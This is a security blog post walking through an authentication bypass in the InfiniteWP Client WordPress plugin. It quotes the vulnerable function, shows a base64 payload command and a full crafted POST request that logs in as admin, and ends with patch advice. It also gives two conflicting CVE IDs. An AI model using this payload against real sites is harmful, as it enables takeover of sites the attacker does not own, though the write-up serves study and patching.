Critical Authentication Bypass Vulnerability in InfiniteWP Client Plugin

Exploiting CVEs
June 30, 2024

Vulnerability Overview

The InfiniteWP Client plugin, versions 1.9.4.4 or earlier, is vulnerable to a critical authentication bypass vulnerability (CVE-2020-8772). This plugin allows WordPress site owners to manage multiple sites from a central server. The vulnerability enables attackers to authenticate to the WordPress installation without proper credentials, potentially leading to unauthorized access and control over the site. 

Exploiting this vulnerability does not require the attacker to have the InfiniteWP server installed. By crafting a request to the InfiniteWP Client plugin, attackers can trick the authentication logic into granting administrative access, bypassing the need for valid credentials. This could allow them to perform malicious actions such as modifying site content, installing malware, or taking control of the entire site.

  • Plugin Name: InfiniteWP Client
  • Affected Versions: Up to and including version 1.9.4.4
  • CVE ID: CVE-2023-2916 
  • CVSS Score: 9.8 (Critical)

Technical Details

The InfiniteWP Client plugin for WordPress, which enables centralized management of multiple WordPress sites, suffers from a critical authentication bypass vulnerability. This vulnerability, identified as CVE-2020-8772, allows attackers to log in as administrators, without proper authentication.

The issue arises due to improper validation of authentication requests within the InfiniteWP Client plugin. Specifically, the vulnerability resides in the iwp_mmb_set_request function located in the init.php file. This function fails to adequately verify the authenticity of certain requests, allowing unauthorized access under specific conditions.

Vulnerable Function: iwp_mmb_set_request

Here is the part of the  iwp_mmb_set_request function that contains a vulnerability leading to authentication bypass. Let's dissect why this vulnerability exists and how it can be exploited.


if(isset($params['username']) && !is_user_logged_in()){
    $user = function_exists('get_user_by') ? get_user_by('login', $params['username']) : iwp_mmb_get_user_by('login', $params['username']);
    if (isset($user) && isset($user->ID)) {
        wp_set_current_user($user->ID);
        // Compatibility with All In One Security
        update_user_meta($user->ID, 'last_login_time', current_time('mysql'));
    }
    $isHTTPS = (bool)is_ssl();
    if($isHTTPS){
        wp_set_auth_cookie($user->ID);
    } else {
        wp_set_auth_cookie($user->ID, false, false);
        wp_set_auth_cookie($user->ID, false, true);
    }
}

Key Issues Leading to Authentication Bypass

Insufficient Validation of Input Parameters: The code checks if the username parameter is set and if the user is not logged in. However, it does not validate the source or authenticity of the request. Any request with a username parameter will be processed.

Lack of Authentication Verification: The code does not verify that the incoming request is from a legitimate, authenticated source. There are no nonce or token checks to ensure that the request is authorized.

Direct User Impersonation: The function wp_set_current_user($user->ID) sets the current user to the user ID obtained from the username parameter without verifying that the requestor has the right to impersonate this user.

Setting Authentication Cookies: After setting the current user, the code sets authentication cookies (wp_set_auth_cookie($user->ID)) for the specified user ID. This action effectively logs in the user without requiring valid credentials.

If an attacker supplies "admin" as the user and "admin" is the admin user in WordPress, here's a detailed step-by-step breakdown of how the code executes and results in authentication bypass:

1. The code checks if the username parameter is present and the user is not already logged in. Since the attacker is not logged in and has provided the username         parameter, this condition is true.


if(isset($params['username']) && !is_user_logged_in())

 2. The next part of the code retrieves the user object for the provided username ("admin"). Assuming "admin" exists, $user will now hold the user object for the admin        user.


$user = function_exists('get_user_by') ? get_user_by('login', $params['username']) : iwp_mmb_get_user_by('login', $params['username']);

3. After that, it checks if the user object and user ID are valid. 


if (isset($user) && isset($user->ID)) {

 4. Since "admin" is a valid user, this condition is true and then it sets the current user to the retrieved user (admin).


wp_set_current_user($user->ID);

 5. The above code effectively sets the global user context to the admin user. Then it updates the user's last login time for compatibility with the All In One Security      plugin.


update_user_meta($user->ID, 'last_login_time', current_time('mysql'));

 6. The next part of the code checks if the connection is over HTTPS.


$isHTTPS = (bool)is_ssl();

 

7. Assuming the site is not using HTTPS, $isHTTPS will be false. So the following code sets the authentication cookies for the admin user. Since it's not HTTPS, it sets      both secure and non-secure cookies.


if($isHTTPS){
    wp_set_auth_cookie($user->ID);
} else {
    wp_set_auth_cookie($user->ID, false, false);
    wp_set_auth_cookie($user->ID, false, true);
}

This sets the cookies necessary to authenticate as the admin user. With the admin user set and authentication cookies in place, the attacker can now access the site with admin privileges.

Exploitation: 

To exploit the CVE-2020-8772 vulnerability in the InfiniteWP Client plugin, follow these steps:

1. Inspect the web application:

   - Scan the wordpress website to see if the InfiniteWP client plugin is installed and also  

     check if  the version is <=1.9.4.4 . 

2. Intercept the request of home page :

   - Use Burp Suite to intercept the request to the target website

3. Change the method:

   - Use the right-click menu to select "Change request method" in order to change the request's format from GET to POST.

4. Create JSON payload:

   - Create the JSON payload with base64 encoding for the authentication bypass:


echo -n '{"iwp_action":"add_site","params":{"username":"admin"}}' | base64 | tr -d '=' | tr '/+' '_-'

  

5. Craft the Exploit:

   - Append the base64-encoded payload with the String mentioned in the exploit URL:


_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo

6. Append the exploit:

- Add this above payload on the body of the intercepted request. The request should look like this:


POST / HTTP/1.1
Host: wordpress_site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=

7. Forward the Modified Request:

   - Click on Forward in Burp Suite to send the modified request to the server. Now check the browser, you’ll get something like this

Once you have completed these steps, then navigate to the homepage of the target website. The attack should be successful, and the attacker will have access to the admin dashboard.

By following these steps, an attacker can exploit the CVE-2020-8772 vulnerability in the InfiniteWP Client plugin to bypass authentication and gain unauthorized access to the WordPress site.

Recommendations: 

      1. Update the Plugin:

  • Ensure that you are using the latest version of the InfiniteWP Client plugin (version 1.9.4.5 or higher). Developers often release security patches in newer versions.
  • Regularly check for plugin updates and apply them promptly.

      2.  Restrict Access to the Plugin:

  • Limit access to the InfiniteWP Client plugin to trusted IP addresses or specific user roles.
  • Avoid exposing the plugin’s functionality to unauthenticated users.

References: 

https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/

https://wpscan.com/vulnerability/fac62d36-0fa1-4b43-8f5c-bddbd0cff140/

https://0day.work/infinitewp-client-1-9-4-5-authentication-bypass/

https://www.cvedetails.com/cve/CVE-2023-2916/

Related posts :

Exploiting CVEs

Exploiting CVEs
April 1, 2024

Text4Shell(CVE-2022-42889)

Blog on CVE-2022-42889 explores a critical vulnerability found in Apache commons text in October 2022. Let's jump into its technicality.
Read More
Exploiting CVEs
March 29, 2024

RCE on MobSF(CVE-2024-21633)

This CVE exposes a critical security vulnerability in Apktool, a widely-used tool for reverse engineering closed-source, third-party Android apps.
Read More
Exploiting CVEs

Path Traversal in Openfire Admin Console

Enter CVE-2023-32315, an authentication bypass vulnerability discovered in Openfire, a popular XMPP server. This exploit grants malicious actors unrestricted access to the Openfire administrative console.
Read More
Web App Security
Web App Security
May 25, 2021

Setting Up Web App Penetration Testing Lab Using ThreadsApp

Introduction With the sheer number of cyber threats which occur every day, a lot of individuals want to tackle that and to …
Read More
Web App Security
June 6, 2018

A User can change the personal details of any other user broken access control

Broken Access Control Hi everyone. Welcome to this new post from ENCIPHERS. So recently, our team at ENCIPHERS conducted …
Read More
Web App Security
September 8, 2018

Finding and exploiting Blind XSS

If you are here, we are already presuming that you know what XSS is and the major types of XSS(i.e Reflected and Stored) …
Read More

Mobile App Security

Mobile App Security
October 25, 2019

Awesome iOS Application Security

This is a repository of iOS Security resources and tools which can be used in iOS pentesting and security research. It’s a ...
Read More
Mobile App Security
January 15, 2020

Xposed Framework Plugins For Android Pentesting

The workflow of Xposed framework Plugins for Android Pentesting Xposed framework Plugins for Android Pentesting helps in...
Read More
Mobile App Security
November 26, 2019

Awesome Android Application Security

Android Application Security This is a write-up of Android Application Security resources and tools which helps in Android...
Read More
An Award-Winning Cyber Security Consulting & Training Company
Email
Headquarter
Enciphers Labs Private Limited,
24th Floor, Tower B, Alphathum, Sector 90, Noida, Uttar Pradesh, India
Company
About usContact UsServicesTrainingBrand Kit
Useful links
Cyber Security PolicyData Protection PolicyResponsible DisclosurePrivacy PolicyHall Of Fame
© 2000-2022, All Rights Reserved

By clicking “Accept”, you agree to the storing of cookies on your device to enhance site usage. View our Privacy Policy for more information.

RejectAccept